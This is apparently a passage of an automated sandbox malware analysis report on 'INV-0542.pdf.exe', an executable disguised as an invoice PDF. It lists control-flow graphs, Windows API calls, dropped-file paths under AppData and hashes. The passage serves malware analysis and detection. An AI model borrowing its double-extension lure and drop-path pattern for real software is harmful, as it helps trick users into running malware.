                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\INV-0542.pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                • API String ID: 2035342205-1788928128
                                                                                                                                                                • Opcode ID: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
                                                                                                                                                                • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                                                                                                                                • Opcode Fuzzy Hash: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
                                                                                                                                                                • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 757 406c5f-406c64 758 406cd5-406cf3 757->758 759 406c66-406c95 757->759 760 4072cb-4072e0 758->760 761 406c97-406c9a 759->761 762 406c9c-406ca0 759->762 763 4072e2-4072f8 760->763 764 4072fa-407310 760->764 765 406cac-406caf 761->765 766 406ca2-406ca6 762->766 767 406ca8 762->767 770 407313-40731a 763->770 764->770 768 406cb1-406cba 765->768 769 406ccd-406cd0 765->769 766->765 767->765 771 406cbc 768->771 772 406cbf-406ccb 768->772 773 406ea2-406ec0 769->773 774 407341-40734d 770->774 775 40731c-407320 770->775 771->772 776 406d35-406d63 772->776 780 406ec2-406ed6 773->780 781 406ed8-406eea 773->781 783 406ae3-406aec 774->783 777 407326-40733e 775->777 778 4074cf-4074d9 775->778 784 406d65-406d7d 776->784 785 406d7f-406d99 776->785 777->774 786 4074e5-4074f8 778->786 782 406eed-406ef7 780->782 781->782 787 406ef9 782->787 788 406e9a-406ea0 782->788 789 406af2 783->789 790 4074fa 783->790 791 406d9c-406da6 784->791 785->791 792 4074fd-407501 786->792 808 407481-40748b 787->808 809 406e7f-406e97 787->809 788->773 798 406e3e-406e48 788->798 794 406af9-406afd 789->794 795 406c39-406c5a 789->795 796 406b9e-406ba2 789->796 797 406c0e-406c12 789->797 790->792 799 406dac 791->799 800 406d1d-406d23 791->800 794->786 801 406b03-406b10 794->801 795->760 810 406ba8-406bc1 796->810 811 40744e-407458 796->811 802 406c18-406c2c 797->802 803 40745d-407467 797->803 804 40748d-407497 798->804 805 406e4e-407017 798->805 817 406d02-406d1a 799->817 818 407469-407473 799->818 806 406dd6-406ddc 800->806 807 406d29-406d2f 800->807 801->790 816 406b16-406b5c 801->816 819 406c2f-406c37 802->819 803->786 804->786 805->783 814 406e3a 806->814 815 406dde-406dfc 806->815 807->776 807->814 808->786 809->788 813 406bc4-406bc8 810->813 811->786 813->796 821 406bca-406bd0 813->821 814->798 822 406e14-406e26 815->822 823 406dfe-406e12 815->823 824 406b84-406b86 816->824 825 406b5e-406b62 816->825 817->800 818->786 819->795 819->797 826 406bd2-406bd9 821->826 827 406bfa-406c0c 821->827 828 406e29-406e33 822->828 823->828 831 406b94-406b9c 824->831 832 406b88-406b92 824->832 829 406b64-406b67 GlobalFree 825->829 830 406b6d-406b7b GlobalAlloc 825->830 833 406be4-406bf4 GlobalAlloc 826->833 834 406bdb-406bde GlobalFree 826->834 827->819 828->806 835 406e35 828->835 829->830 830->790 836 406b81 830->836 831->813 832->831 832->832 833->790 833->827 834->833 838 407475-40747f 835->838 839 406dbb-406dd3 835->839 836->824 838->786 839->806
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                                                                                                                • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                                                                                                                                • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                                                                                                                • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004068B5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                • String ID: X_B
                                                                                                                                                                • API String ID: 2295610775-941606717
                                                                                                                                                                • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                                                                • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                                                                                                                                • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                                                                • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C
                                                                                                                                                                APIs
                                                                                                                                                                • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 0040228E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis
                                                                                                                                                                • API String ID: 542301482-747733597
                                                                                                                                                                • Opcode ID: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
                                                                                                                                                                • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                                                                                                                                                • Opcode Fuzzy Hash: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
                                                                                                                                                                • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                • Opcode ID: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
                                                                                                                                                                • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                                                                                                                                                • Opcode Fuzzy Hash: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
                                                                                                                                                                • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 202 403fc1-403fd3 203 403fd9-403fdf 202->203 204 40413a-404149 202->204 203->204 205 403fe5-403fee 203->205 206 404198-4041ad 204->206 207 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 204->207 210 403ff0-403ffd SetWindowPos 205->210 211 404003-40400a 205->211 208 4041ed-4041f2 call 40450c 206->208 209 4041af-4041b2 206->209 207->206 221 4041f7-404212 208->221 213 4041b4-4041bf call 401389 209->213 214 4041e5-4041e7 209->214 210->211 216 40400c-404026 ShowWindow 211->216 217 40404e-404054 211->217 213->214 238 4041c1-4041e0 SendMessageW 213->238 214->208 220 40448d 214->220 222 404127-404135 call 404527 216->222 223 40402c-40403f GetWindowLongW 216->223 224 404056-404068 DestroyWindow 217->224 225 40406d-404070 217->225 227 40448f-404496 220->227 234 404214-404216 call 40140b 221->234 235 40421b-404221 221->235 222->227 223->222 236 404045-404048 ShowWindow 223->236 228 40446a-404470 224->228 230 404072-40407e SetWindowLongW 225->230 231 404083-404089 225->231 228->220 241 404472-404478 228->241 230->227 231->222 237 40408f-40409e GetDlgItem 231->237 234->235 242 404227-404232 235->242 243 40444b-404464 DestroyWindow EndDialog 235->243 236->217 244 4040a0-4040b7 SendMessageW IsWindowEnabled 237->244 245 4040bd-4040c0 237->245 238->227 241->220 246 40447a-404483 ShowWindow 241->246 242->243 247 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 242->247 243->228 244->220 244->245 249 4040c2-4040c3 245->249 250 4040c5-4040c8 245->250 246->220 274 404287-40428c 247->274 275 40428f-4042cb ShowWindow KiUserCallbackDispatcher call 4044e2 EnableWindow 247->275 252 4040f3-4040f8 call 404499 249->252 253 4040d6-4040db 250->253 254 4040ca-4040d0 250->254 252->222 257 404111-404121 SendMessageW 253->257 259 4040dd-4040e3 253->259 254->257 258 4040d2-4040d4 254->258 257->222 258->252 262 4040e5-4040eb call 40140b 259->262 263 4040fa-404103 call 40140b 259->263 272 4040f1 262->272 263->222 271 404105-40410f 263->271 271->272 272->252 274->275 278 4042d0 275->278 279 4042cd-4042ce 275->279 280 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404302-404313 SendMessageW 280->281 282 404315 280->282 283 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 281->283 282->283 283->221 294 404360-404362 283->294 294->221 295 404368-40436c 294->295 296 40438b-40439f DestroyWindow 295->296 297 40436e-404374 295->297 296->228 298 4043a5-4043d2 CreateDialogParamW 296->298 297->220 299 40437a-404380 297->299 298->228 301 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->301 299->221 300 404386 299->300 300->220 301->220 306 404431-404444 ShowWindow call 40450c 301->306 308 404449 306->308 308->228
                                                                                                                                                                APIs
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                                                                                                                                • ShowWindow.USER32(?), ref: 0040401D
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00404048
                                                                                                                                                                • DestroyWindow.USER32 ref: 0040405C
                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00404094
                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00404296
                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 004042C3
                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                                                                                                                                • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                                                                                                                                • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 121052019-0
                                                                                                                                                                • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                                                                                                                • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                                                                                                                                • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                                                                                                                • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 309 403c13-403c2b call 406935 312 403c2d-403c3d call 406488 309->312 313 403c3f-403c76 call 40640f 309->313 321 403c99-403cc2 call 403ee9 call 405f18 312->321 317 403c78-403c89 call 40640f 313->317 318 403c8e-403c94 lstrcatW 313->318 317->318 318->321 327 403d54-403d5c call 405f18 321->327 328 403cc8-403ccd 321->328 333 403d6a-403d8f LoadImageW 327->333 334 403d5e-403d65 call 40657e 327->334 328->327 329 403cd3-403ced call 40640f 328->329 335 403cf2-403cfb 329->335 337 403e10-403e18 call 40140b 333->337 338 403d91-403dc1 RegisterClassW 333->338 334->333 335->327 339 403cfd-403d01 335->339 352 403e22-403e2d call 403ee9 337->352 353 403e1a-403e1d 337->353 342 403dc7-403e0b SystemParametersInfoW CreateWindowExW 338->342 343 403edf 338->343 340 403d13-403d1f lstrlenW 339->340 341 403d03-403d10 call 405e3d 339->341 347 403d21-403d2f lstrcmpiW 340->347 348 403d47-403d4f call 405e10 call 406541 340->348 341->340 342->337 346 403ee1-403ee8 343->346 347->348 351 403d31-403d3b GetFileAttributesW 347->351 348->327 355 403d41-403d42 call 405e5c 351->355 356 403d3d-403d3f 351->356 362 403e33-403e4d ShowWindow call 4068c5 352->362 363 403eb6-403eb7 call 405699 352->363 353->346 355->348 356->348 356->355 370 403e59-403e6b GetClassInfoW 362->370 371 403e4f-403e54 call 4068c5 362->371 366 403ebc-403ebe 363->366 368 403ec0-403ec6 366->368 369 403ed8-403eda call 40140b 366->369 368->353 376 403ecc-403ed3 call 40140b 368->376 369->343 374 403e83-403ea6 DialogBoxParamW call 40140b 370->374 375 403e6d-403e7d GetClassInfoW RegisterClassW 370->375 371->370 379 403eab-403eb4 call 403b63 374->379 375->374 376->353 379->346
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                                                                                                                  • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                                                                                                                • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\INV-0542.pdf.exe",00008001), ref: 00403C94
                                                                                                                                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420), ref: 00403D14
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                                                                                                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis), ref: 00403D7B
                                                                                                                                                                  • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                                                                                                                • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                                                                                                                                • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\INV-0542.pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                • API String ID: 1975747703-303122720
                                                                                                                                                                • Opcode ID: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
                                                                                                                                                                • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                                                                                                                                • Opcode Fuzzy Hash: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
                                                                                                                                                                • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406031 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406541 call 405e5c call 406541 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 402 403225-403228 396->402 403 403278-40327d 396->403 400 403150-403159 call 4034be 398->400 401 40314e 398->401 409 40327f-403287 call 40303e 400->409 410 40315f-403166 400->410 401->400 405 40322a-403242 call 4034d4 call 4034be 402->405 406 40324c-403276 GlobalAlloc call 4034d4 call 4032d9 402->406 403->388 405->403 433 403244-40324a 405->433 406->403 431 403289-40329a 406->431 409->403 415 4031e2-4031e6 410->415 416 403168-40317c call 405fec 410->416 420 4031f0-4031f6 415->420 421 4031e8-4031ef call 40303e 415->421 416->420 430 40317e-403185 416->430 427 403205-40320d 420->427 428 4031f8-403202 call 406a22 420->428 421->420 427->398 432 403213 427->432 428->427 430->420 436 403187-40318e 430->436 437 4032a2-4032a7 431->437 438 40329c 431->438 432->396 433->403 433->406 436->420 439 403190-403197 436->439 440 4032a8-4032ae 437->440 438->437 439->420 441 403199-4031a0 439->441 440->440 442 4032b0-4032cb SetFilePointer call 405fec 440->442 441->420 443 4031a2-4031c2 441->443 446 4032d0 442->446 443->403 445 4031c8-4031cc 443->445 447 4031d4-4031dc 445->447 448 4031ce-4031d2 445->448 446->388 447->420 449 4031de-4031e0 447->449 448->432 448->447 449->420
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004030B3
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                                                                                                                                  • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
